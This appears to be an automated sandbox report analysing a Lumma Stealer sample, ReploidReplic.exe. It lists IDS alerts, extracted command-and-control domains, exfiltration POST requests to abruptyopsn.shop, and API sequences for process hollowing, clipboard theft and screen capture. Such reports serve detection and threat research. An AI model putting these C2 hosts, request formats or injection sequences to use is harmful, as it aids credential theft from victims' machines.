Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	2_2_008DC510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edi, eax	2_2_008BBD6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	2_2_008BDE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], bp	2_2_008BCECA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	2_2_008DE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]	2_2_008AC6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [edi], bl	2_2_008A8EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h	2_2_008DFE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_008B6F8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, ecx	2_2_008B6F8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [esi], cx	2_2_008B6F8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	2_2_008C4F91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	2_2_008C4F91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	2_2_008DDFB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_008BBFCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	2_2_008C37D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]	2_2_008B7FE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]	2_2_008B7FE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then push eax	2_2_008ABF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_008B8740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edi], dx	2_2_008B4777

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49742 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.48.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: ingreem-eilish.biz
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop

Source: Joe Sandbox View

IP Address: 104.21.48.1 104.21.48.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.48.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8Q1SN741JY6N9PGIPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18164Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1MZ47H0KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8731Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GPAI8DCFR4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XPL7PGYO3KAM3SH2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1265Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=280R3H752XCOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1094Host: abruptyopsn.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: abruptyopsn.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: ingreem-eilish.biz
Source: global traffic	DNS traffic detected: DNS query: nearycrepso.shop
Source: global traffic	DNS traffic detected: DNS query: abruptyopsn.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abruptyopsn.shop

Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000002.1858835809.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/
Source: aspnet_regiis.exe, 00000002.00000003.1793722966.0000000005206000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1793743243.000000000520C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1794325694.000000000520F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/Q
Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/Y
Source: aspnet_regiis.exe, 00000002.00000002.1858761118.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/api
Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/api3L
Source: aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apiF9
Source: aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apiHP2
Source: aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/apil
Source: aspnet_regiis.exe, 00000002.00000003.1848294035.0000000002CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop/s
Source: aspnet_regiis.exe, 00000002.00000002.1859335137.0000000005218000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1847974851.0000000005218000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://abruptyopsn.shop:443/api
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008D2D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_008D2D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008D2D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_008D2D70

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008D2FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_008D2FE0

System Summary

PE file contains section with special chars

Source: ReploidReplic.exe

Static PE information: section name: KzTnD~C

PE file has nameless sections

Source: ReploidReplic.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE078B0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,CloseHandle,CloseHandle,NtWriteVirtualMemory,NtCreateThreadEx,		0_2_6CE078B0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE06BD0 GetModuleHandleW,NtQueryInformationProcess,		0_2_6CE06BD0

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0083DCE0	0_2_0083DCE0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_008592E0	0_2_008592E0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0082F600	0_2_0082F600
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0085CC30	0_2_0085CC30
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00825640	0_2_00825640
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00827E40	0_2_00827E40
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0083FA60	0_2_0083FA60
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00827070	0_2_00827070
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00853590	0_2_00853590
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0083DFB0	0_2_0083DFB0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00826BE0	0_2_00826BE0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_008543E0	0_2_008543E0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0083E710	0_2_0083E710
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00824350	0_2_00824350
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00823950	0_2_00823950
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00826360	0_2_00826360
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00829370	0_2_00829370
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE078B0	0_2_6CE078B0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE017F0	0_2_6CE017F0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE06BD0	0_2_6CE06BD0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE074F0	0_2_6CE074F0
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE01010	0_2_6CE01010
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE04900	0_2_6CE04900
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE192F1	0_2_6CE192F1
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_6CE0E6B0	0_2_6CE0E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C6000	2_2_008C6000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C1060	2_2_008C1060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D8860	2_2_008D8860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DFB80	2_2_008DFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B9362	2_2_008B9362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008E0480	2_2_008E0480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DBCE0	2_2_008DBCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D84F0	2_2_008D84F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A95A0	2_2_008A95A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B8DF1	2_2_008B8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CBE8A	2_2_008CBE8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AD6F8	2_2_008AD6F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008ADE48	2_2_008ADE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A8640	2_2_008A8640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B5882	2_2_008B5882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AA8A0	2_2_008AA8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D90A0	2_2_008D90A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF0CB	2_2_008DF0CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A38D0	2_2_008A38D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A58E0	2_2_008A58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D08E0	2_2_008D08E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AD0FF	2_2_008AD0FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A88F0	2_2_008A88F0
